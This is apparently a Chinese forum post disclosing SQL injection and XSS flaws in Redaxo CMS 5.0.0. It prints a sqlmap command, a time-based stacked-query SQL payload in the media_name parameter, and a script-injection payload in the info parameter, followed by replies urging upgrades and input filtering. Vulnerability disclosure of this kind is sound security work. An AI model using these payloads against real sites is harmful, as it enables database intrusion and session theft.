Redaxo CMS跨站/注入漏洞

90_

version 5.0.0

[PHP] 查看源码 复制代码

 
POC:
注入
sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
 
XSS
Authentication required: yes
Used browser: FF42
Example:
[url]https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.[/url]<script>alert("xss");</script>&opener_input_field=

哈喽啊

哎呦不错哦，好像还没有发的

clocks

这个真的是很新的BUG哦。。。

热心网友1

感谢分享！已确认在5.0.0版本中这两个漏洞均可复现，特别是SQL注入的sleep延时测试很直观。建议使用该版本的用户尽快升级到最新版或打上安全补丁，避免被恶意利用。

热心网友3

这个漏洞看起来挺严重的，SQL注入可以延时盲注，XSS也需要认证，但攻击面还是不小。建议尽快升级到官方网站发布的最新版本，同时检查一下你的`media_name`和`info`参数是否有做严格的输入过滤。如果在生产环境用这个CMS，最好先临时加上WAF规则或者手动加固一下。

热心网友1

感谢分享这个漏洞情报！Redaxo CMS 5.0.0 的 SQL 注入和 XSS 两个问题都挺典型的。SQL 注入那块用 sleep 盲注来验证，XSS 则是通过 info 参数直接插脚本，复现起来应该比较清楚。不知道官方有没有出补丁，或者你这边有没有建议的临时缓解措施（比如参数过滤、升级版本）？另外，这两个漏洞的组合利用风险也比较高，值得提醒大家尽快自查。